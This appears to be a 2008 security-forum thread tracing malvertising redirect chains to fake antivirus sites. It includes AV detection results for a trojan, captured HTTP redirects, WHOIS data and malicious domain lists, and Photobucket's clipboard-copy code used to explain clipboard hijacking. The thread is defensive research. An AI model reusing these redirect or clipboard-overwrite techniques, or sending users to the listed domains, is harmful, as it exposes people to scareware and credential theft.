Sophos 4.34.0 2008.10.09 -
Sunbelt 3.1.1708.1 2008.10.09 -
Symantec 10 2008.10.09 -
TheHacker 6.3.1.0.103 2008.10.07 -
TrendMicro 8.700.0.1004 2008.10.09 -
VBA32 3.12.8.6 2008.10.09 -
ViRobot 2008.10.9.1414 2008.10.09 -
VirusBuster 4.5.11.0 2008.10.09 -

______________________________

Filename: x.exe / orz.exe

Additional information
MD5: 239ce0f68006f106972709553eef5c1f
SHA1: a5867f436be362472b6057af6c9d51724f168239
SHA256: fa259032c36a152e6bf240c12bc2bace89d4df5ef441955612b9c23883f5e7cf

QUOTE

File x.exe received on 10.08.2008 02:13:29 (CET)
AhnLab-V3 - - -
AntiVir - - TR/PSW.O.juki.33056
Authentium - - W32/Heuristic-KPP!Eldorado
Avast - - Win32:Trojan-gen {Other}
AVG - - -
BitDefender - - -
CAT-QuickHeal - - -
ClamAV - - -
DrWeb - - DLOADER.Trojan
eSafe - - -
eTrust-Vet - - -
Ewido - - Heuristic.Win32.AVKiller
F-Prot - - W32/Heuristic-KPP!Eldorado
F-Secure - - -
Fortinet - - -
GData - - Win32:Trojan-gen {Other}
Ikarus - - -
K7AntiVirus - - -
Kaspersky - - Trojan-GameThief.Win32.WOW.cds
McAfee - - -
Microsoft - - -
NOD32 - - Win32/PSW.WOW.NET
Norman - - -
Panda - - Suspicious file
PCTools - - -
Prevx1 - - -
Rising - - -
SecureWeb-Gateway - - Trojan.PSW.O.juki.33056
Sophos - - Troj/WoW-KD
Sunbelt - - -
Symantec - - -
TheHacker - - -
TrendMicro - - Mal_OLGM-6
VBA32 - - -
ViRobot - - -
VirusBuster - - -

<h4></h4>
adnewgeneration.com is involved in redirects at careerbuilder.com this week. At the time of the writeup I'm unable to reproduce it unfortunately.

Known elements ...

The following code does trigger the redirect. I left out geo-location for privacy reasons.

CODE

GET /?campaign=2235499&size=300x250&clickurl=http://discoverireland.com&linktarget=_blank HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adnewgeneration.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Transfer-Encoding: chunked
X-Powered-By: PHP/5.2.6-5
Content-type: text/html
Date: Thu, 09 Oct 2008 17:48:17 GMT
Server: lighttpd/1.4.19

<html><script language="javascript" src="http://adtds.adnewgeneration.com/in.cgi?6&campaign=2235499®ion=[removed]&country=[removed]&city=[removed]"></script><body rightmargin=0 leftmargin=0 topmargin=0 bottommargin=0>.<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000".....   codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0".....   width="300" height="250">.....<param name="movie" value="http://adnewgeneration.com/2235499/300x250.swf?clickTag=http://discoverireland.com&clickTARGET=_blank"> .....<param name="quality" value="high">.....<param name="menu" value="false">.....<param name="clickTag" value="http://discoverireland.com">.....<param name="clickTARGET" value="_blank">.....
<!--[if !IE]> <-->.....<object data="http://adnewgeneration.com/2235499/300x250.swf?clickTag=http://discoverireland.com&clickTARGET=_blank"......width="300" height="250" type="application/x-shockwave-flash">.....<param name="quality" value="high">.....<param name="menu" value="false">.....<param name="pluginurl" value="http://www.macromedia.com/go/getflashplayer">.....<param name="clickTag" value="http://discoverireland.com">.....<param name="clickTARGET" value="_blank">.....</object>.....<!--> <![endif]-->.</object>.</body></html>

______________________________

adnewgeneration.com/2235499/300x250.swf

The Flash advertisement itself is clean; the screenshots are just for "visual reference" because it's NOT the Flash advert triggering the redirect but the script located on the same server, e.g. adtds.adnewgeneration.com.

______________________________

adtds.adnewgeneration.com/in.cgi?

in.cgi?6 is "dormant" at the time of the writeup (it wasn't when I checked the logs) but the network capture reveals an interesting piece of information on who's behind the domain as seen below.

CODE

HTTP/1.0 200 OK
Set-Cookie: SL_6_0000=_1_; domain=adtds2.promoplexer.com; path=/; expires=Fri, 10-Oct-2008 21:50:59 GMT
Content-Type: text/javascript
Content-Length: 0
Connection: close
Date: Thu, 09 Oct 2008 21:50:59 GMT
Server: lighttpd/1.5.0

Regular readers will recognize adtds2.promoplexer.com.
Just for fun ... 7

Now, the only place where I see an 300x250 advertisment at careerbuilder.com is on the bottom left and from the look of it they are served by RealMedia ...

Anyone having contacts and / or content from adnewgeneration.com should threat those with extreme caution.

<h4></h4>
adnewgeneration.com - 70.38.11.165

Website Title: 404 - Not Found
ICANN Registrar: ENOM, INC.
Created: 2008-09-16
Expires: 2009-09-16
Updated: 2008-09-16
Name Server: NS1.DOUBLECLICKADVERTISING.COM (has 1 domains)
Name Server: NS2.DOUBLECLICKADVERTISING.COM
Whois Server: whois.enom.com
Server Type: lighttpd/1.4.19
IP Location - California - Santa Ana - Iweb Dedicated Cl
Dedicated Hosting: adnewgeneration.com is hosted on a dedicated server.
Registration Service Provided By: NameCheap.com

Registrant Contact:
Ind
Ivan Durov
Kiev
Kiev, Kiev 01021
UA

Administrative Contact:
Ind
Ivan Durov ()
+380.937284982
Fax: +1.5555555555
Kiev
Kiev, Kiev 01021
UA

adtds.adnewgeneration.com - 67.205.93.98

ns1.adnewgeneration.com - 70.38.11.165
ns2.adnewgeneration.com - 70.38.11.165
______________________________

tds.gorotation.com / gorotation.com - 67.205.93.102

Website Title: 404 - Not Found
ICANN Registrar: ENOM, INC.
Created: 2008-10-03
Expires: 2009-10-03
Updated: 2008-10-03
Name Server: NS1.GOROTATION.COM (has 1 domains)
Name Server: NS2.GOROTATION.COM
Whois Server: whois.enom.com
IP Location - Ukraine - Private Customer - Iweb
Registration Service Provided By: NameCheap.com
Registrant Contact: WhoisGuard Protected
______________________________

scanner.antivirus-2009-pro.net - 67.205.75.11

Domain name: antivirus-2009-pro.net

Registrant Contact:
Ind
Ivan Durov
Kiev
Kiev, Kiev 01021
UA

Name Servers:
ns1.antivirus-2009-pro.net
ns2.antivirus-2009-pro.net

Creation date: 01 Oct 2008 23:04:21
Expiration date: 01 Oct 2009 23:04:21

Thx guys for the report & capture.

<h4></h4>
Yesterday we discovered a couple of new domains related to the well known adtds2.promoplexer.com / adtds.trackads.net combo.

• adnewgeneration.com - 70.38.11.165
• adtds.adnewgeneration.com - 67.205.93.98
• tds.gorotation.com / gorotation.com - 67.205.93.102

Let's expand the list a lil' bit ...

Redirects.

tds.gorotation.com/?paramss=[removed]
adtds.gorotation.com/in.cgi?[removed]&depid=[removed]&
antivirus-scanner-online.com/scan.php?campaign=[removed]&landid=[removed]&bs=[removed]

adtds.gorotation.com - 67.205.93.102

Name Server: NS1.GOROTATION.COM
Name Server: NS2.GOROTATION.COM
Updated Date: 03-oct-2008
Creation Date: 03-oct-2008
Expiration Date: 03-oct-2009
______________________________

antivirus-scanner-online.com - 67.205.75.14

Website Title: 404 - Not Found
ICANN Registrar: ENOM, INC.
Created: 2008-10-03
Expires: 2009-10-03
Updated: 2008-10-03
Name Server: NS1.ANTIVIRUS-SCANNER-ONLINE.COM (has 1 domains)
Name Server: NS2.ANTIVIRUS-SCANNER-ONLINE.COM
IP Location - Ukraine - Individual
Dedicated Hosting: antivirus-scanner-online.com is hosted on a dedicated server.
Registration Service Provided By: NameCheap.com
Registrant Contact: WhoisGuard Protected

antivirus-scanner-online.com has some interesting neighbours, several are already well known. We also see that the NS servers of gorotation.com have the same IP as the NS server of unicastads.com ... another "old friend."

67.205.75.9

• antispywaredeluxe.com
• ns.antispywaredeluxe.com
• ns.spywaredestructor.com
• spywaredestructor.com
• www.pidosoftware.com

67.205.75.10

• imunizator.com
• www.imunizator.com

67.205.75.11

• adszedo.com
• id325708.adszedo.com
• ns.adszedo.com
• scanner.antivirus-2009-pro.com

67.205.75.12

• internetsecuritydeluxe.com
• ns.internetsecuritydeluxe.com
• ns1.internetsecuritydeluxe.com
• ns2.internetsecuritydeluxe.com

67.205.75.13

• ns.unicastads.com
• ns1.gorotation.com
• ns2.gorotation.com

67.205.75.14

• antivirus-scanner-online.com
• ns1.antivirus-scanner-online.com
• ns2.antivirus-scanner-online.com

<h4></h4>
Redirects.

adtds.adnewgeneration.com/in.cgi?[removed]
powertds.ws/soft.php?aid=[removed]&d=[removed]&product=XPA&refer=[removed]
antvirushelp.com/2009/1/freescan.php?id=[removed]

powertds.ws makes me think of securetds.ws, involved in the incident at surfline.com. You can read more about that on Sandi's blog.

powertds.ws - 216.240.134.208

Whois Server: whois.website.ws
IP Location - California - Irvine - Go2online Corp
Registrar Name: Rustelekom
Registrar Telephone: 1 866 6254678
Registrar Whois: www.nameservers.ru
Domain Created: 2008-09-15
Domain Last Updated: 2008-09-26
Domain Currently Expires: 2009-09-15
Current Nameservers: ns1.freefastdns.com - ns2.freefastdns.com
______________________________

antvirushelp.com - 89.149.241.106 & 216.240.134.208

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-09-10
Expires: 2009-09-10
Updated: 2008-10-06
Name Server: NS1.FREEFASTDNS.COM (has 39 domains)
Name Server: NS2.FREEFASTDNS.COM
IP Location - Berlin - Berlin - Netdirekt E.k
Registration Service Provided By: REGNAME.BIZ
Contact: +7.9033729049
Website: www.regname.biz

Registrant:
N/A
Moira Jones ()
325 West Gaines Street, Room 634
Tallahassee
Florida,32399
US
Tel. +850.2450449

hostnames sharing ip with a-records.

1. altawebgl-500.com
2. googlescanners-360.com
3. masterspitetds09.com
4. protectedtds.name
5. scanner-center.com
6. seamastersoft.com
7. trustedpaymenssite.com

domains sharing nameservers.

1. computerantiviruspro.com - No IP
2. freefastdns.com - No IP
3. livetds.ws - 89.18.189.35
4. ltraffic.cc - 78.108.178.232
5. mysecuritysupport.com - 208.72.169.100
6. securedownloadcenter.com - 208.72.168.158
7. winupdates-server.com - 89.18.189.44

<h4></h4>
Redirects.

windows-scannercenter.com/?id=82961038475
securetds.ws/soft.php?aid=011804&d=1&product=XPA&refer=563fa6255

Redirect doesn't go further because securetds.ws is dead. windows-scannercenter.com is still active so nothing prevents them from updating the link.

windows-scannercenter.com - 83.229.251.28

Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Whois Server: whois.PublicDomainRegistry.com
Referral URL: www.PublicDomainRegistry.com
Name Server: NS1.WINDOWS-SCANNERCENTER.COM
Name Server: NS2.WINDOWS-SCANNERCENTER.COM
Updated Date: 24-sep-2008
Creation Date: 21-sep-2008

<h4></h4>
I was doing some research on some of the domains we discovered yesterday when suddenly I did fall on these 2 forum posts ...

Photobucket.com

windows-scannercenter.com/?id=82961038475
quicktds.name/soft.php?aid=[removed]&d=1&product=XPA&refer=[removed]
antiviruslivecheck.com/2009/1/freescan.php?id=[removed]

forums.guru3d.com

windows-scannercenter.com/?id=274400151
quicktds.name/soft.php?aid=[removed]&d=1&product=XPA&refer=[removed]
antiviruslivecheck.com/2009/1/freescan.php?id=[removed]

Why the hell would a Photobucket Community Support person & a member with 1380 posts deliberately insert a malicious URL into their replies? This is very weird ... is this again a sign of clipboard hijacking or is this something way more serious and when I say serious I'm thinking about a hack / exploit in forum software. I preview my posts before hitting the reply button and even without that, you would see the URL you insert don't ya think?
______________________________

quicktds.name - 216.240.134.211

Domain Name ID: 4026204DOMAIN-NAME
Domain Name: QUICKTDS.NAME
Sponsoring Registrar ID: 21REGISTRAR-NAME
Sponsoring Registrar: Directi Internet Solutions Pvt. Ltd. d/b/a PublicDomainRegistry.com
Name Server: NS1.STARTED.RU
Name Server: NS2.STARTED.RU
Created On: 2008-09-16 12:57:31
Expires On: 2009-09-16 12:57:31
Updated On: 2008-09-16 12:57:32
______________________________

antiviruslivecheck.com - 64.86.17.44 & 216.240.134.211

ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-09-10
Expires: 2009-09-10
Updated: 2008-10-10
Name Server: NS1.ROBONAME.COM (has 148 domains)
Name Server: NS2.ROBONAME.COM
Name Server: NS3.ROBONAME.COM
Name Server: NS4.ROBONAME.COM
Registration Service Provided By: RUSTELEKOM LLC
Contact: +1.8666254678
Website: rustelekom.biz
Registrant: PrivacyProtect.org

hostnames sharing ip with a-records

1. adaptivetds.name
2. antivirusfulldefence.com
3. digipayments-soft.com
4. ns3.bigskycomputerservices.com
5. ns3.computinghost.com
6. ns3.emb.com.mx
7. ns3.mokumdesign.com
8. ns3.nigerianhost.com
9. ns3.simkiss4rum.com
10. ns3.wimago.com
11. ns3.xisto.com
12. ns3.yah00-city.com
13. ns8.dnshree.com
14. onlinescannersite9.com
15. tdsvassarium.com
16. vassariumpromo.com

<h4></h4>
As mentioned yesterday, I did find it odd that a Photobucket Community Support person had a malicious link in one of his replies. Photobucket is probably (again) the victim of a malicious advertisement.

http://forums.photobucket.com/showthread.php?t=30006

Your 'Auto-Copy' feature is being exploited.
--------------------------------------------------------------------------------
One of the ads around Photobucket is overwriting copied image code with a link to an "antivirus" site. I know this site personally from working at Geek Squad. It's a website that will install a nasty piece of adware named Antivirus 2008.

This has happened to me twice today for the first time on two different computers at two different times (+3 hours) both happened when copying an image link/code from PhotoBucket.

If a site admin/webmaster would like to get with me via PM, I can give you the site address, as I don't want to post it on a public forum.

Thanks.

Until this issue has been tracked down, extreme caution is advised when visiting Photobucket and forums.guru3d.com. Seeing the id of the campaigns, there is a big chance they involve 2 distinct advertisements. Don't hesitate to PM us if you have any information regarding this "clipboard" issue.

If needed, instructions on how to clear you clipboard can be found here. Just make sure that all browser windows are closed before.

<h4></h4>
Be very carefull if you visit the Favell Museum website - www.favellmuseum.org - from a search engine. The .htaccess file has been hacked and is redirecting people to a fake online scanner. If you directly paste the website into your browser, you won't be affected.

CODE

GET / HTTP/1.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=Favell+Museum&btnG=Google+Search&aq=f&oq=
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.favellmuseum.org
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Sun, 12 Oct 2008 04:23:42 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Server: Apache
Location: http://87.248.180.90/in.html?s=ipw2

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://87.248.180.90/in.html?s=ipw2">here</A>.<P>
</BODY></HTML>

Complete redirect.

87.248.180.90/in.html?s=ipw2
quicktds.name/soft.php?aid=[snip]&d=6&product=XPA&refer=[snip]
pcvirusbuster.com/2009/1/freescan.php?id=[snip]

______________________________

pcvirusbuster.com - 64.86.17.44 & 216.240.134.211

ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-10-07
Updated: 2008-10-07
Name Server: SKY.EARTH.ORDERBOX-DNS.COM (has 37,547 domains)
Name Server: SKY.MARS.ORDERBOX-DNS.COM
Name Server: SKY.MERCURY.ORDERBOX-DNS.COM
Name Server: SKY.VENUS.ORDERBOX-DNS.COM
IP Location - Ontario - Brampton - Velcom
Registration Service Provided By: NICS.NAME
Contact: +7.8469724045
Website: nics.name
Registrant: PrivacyProtect.org

<h4></h4>
Redirects.

protectedtds.name/soft.php?aid=[*]&d=6&product=XPA&refer=[*]
professionalpcscan.com/2009/1/freescan.php?id=[*]

professionalpcscan.com - 89.149.241.106 & 216.240.134.208

Creation Date: 10-Sep-2008
Updated Date: 12-oct-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Registration Service Provided By: RUSTELEKOM LLC
Contact: +1.8666254678
Website: rustelekom.biz
Registrant: PrivacyProtect.org
Domain servers in listed order: ns2.false.com - ns1.false.com

<h4></h4>
I have been trying to trace the clipboard hijacking incident down on Photobucket this weekend without any success unfortunately. One thing is for sure, the person's browser was indeed displaying a malvertizement, I actually can demonstrate this very easily. Whether it was actually on Photobucket or another site is yet unknown, it all depends on how many pages / tabs were open…
Before we go any further, let me emphasis in bold a couple of words from his post on the Photobucket forums.

QUOTE(Kimberly @ Oct 11 2008, 03:23 PM) [snapback]89532[/snapback]

Your 'Auto-Copy' feature is being exploited.
--------------------------------------------------------------------------------
One of the ads around Photobucket is overwriting copied image code with a link to an "antivirus" site. I know this site personally from working at Geek Squad. It's a website that will install a nasty piece of adware named Antivirus 2008.

This has happened to me twice today for the first time on two different computers at two different times (+3 hours) both happened when copying an image link/code from PhotoBucket.

If a site admin/webmaster would like to get with me via PM, I can give you the site address, as I don't want to post it on a public forum.

Thanks.

How does Photobucket copy a link to your clipboard.

The answer is simple, they use some javascript code and most important of all ... a very small Flash file. Illustration ...

The HTML code of that page contains of course different elements and tags, but we are only interested by the portion relevant to our demonstration.

CODE

  <div id="linksContainer">
        <div id="htmlLinksContainer">
            <label for="txtThumbURLTag2"><b>Share URL - </b>
              Email & IM</label>
            <input name="txtThumbURLTag2" id="txtThumbURLTag2"
                   class="textBox" type="text"
                   value="http://media.photobucket.com/image/halloween%20or%20halloween%20icons/hspaar/My%20Icons/Halloween.jpg"
                   readonly="readonly" onclick="trackCodeClickMediaDetail(event);
                                                copyToClipboard(this);">
            
            <label for="txtThumbURLTag2"><b>Direct Link - </b>
              Layout Pages</label>
            <input name="txtThumbURLTag2" id="txtThumbURLTag2"
                   class="textBox" type="text"
                   value="http://i22.photobucket.com/albums/b346/hspaar/My%20Icons/Halloween.jpg"
                   readonly="readonly" onclick="trackCodeClickMediaDetail(event);
                                                copyToClipboard(this);">
            
            .... snip ...
            
        </div>
   </div>

When you click inside the box containing the code you would like to copy, Direct Link - Layout Pages in our sample, 2 functions are called:

• trackCodeClickMediaDetail
• copyToClipboard

We are of course only interested in copyToClipboard. Those fuctions are stored in a js file. Below is the copyToClipboard function with the reference to the Flash file ... var K="/include/swf/_clipboard.swf

CODE

function copyToClipboard(E)
{
   var K="/include/swf/_clipboard.swf";
   var H="notifyTextCopied";
   var J=Element.up(E);
   var C=document.createElement("div");
   C.setAttribute("id",H);
   C.appendChild(document.createTextNode("Copied"));
   J.appendChild(C);
   E.onblur=function(L)
   {
     Element.hide(C);
     return true
   }
;var G=Element.cumulativeOffset(E);
   var F=Element.positionedOffset(E);
   Element.show(C);
   if(G.left<(C.offsetWidth+2))
   {
     C.style.left=(F.left+(E.offsetWidth+3))+"px"
   }
   else
   {
     C.style.left=(F.left-(C.offsetWidth+2))+"px"
   }
   C.style.top=F.top+"px";
   var B=Effect.Fade(C,
   {
     fps:75,from:1.9,to:0,duration:1,queue:"front",afterFinish:function()
     {
       Element.remove(C)
     }
    
   }
   );
   window.status="Copied text to clipboard";
   var I="flashcopier";
   if(!$(I))
   {
     var A=document.createElement("div");
     A.id=I;
     document.body.appendChild(A)
   }
   $(I).innerHTML="";
   var D='<embed src="'+K+'" FlashVars="clipboard='+escape(E.value)+'" width="0" height="0" type="application/x-shockwave-flash"></embed>';
   $(I).innerHTML=D;
   E.select();
   return true
}

The link is stored in a variable called "clipboard" and _clipboard.swf is loaded into the browser. _clipboard.swf contains an actionscript with System.setClipboard(clipboard).

That's how the links are copied to your clipboard at Photobucket.

Now if the clipboard content was overwritten, it means that another Flash file was using the same function at the same time, which implies that the malicious banner was being displayed on that Photobucket page or eventually on another one ... supposing any other pages / websites were actually open of course. My 2 cts ? ... We all are aware that they can be very difficult to track down but I personally have the feeling that a malicious advertisement is / was circulating at Photobucket. I came across a highly suspicious banner but at the time of the write-up I can't confirm if the Flash file is "bad" or not.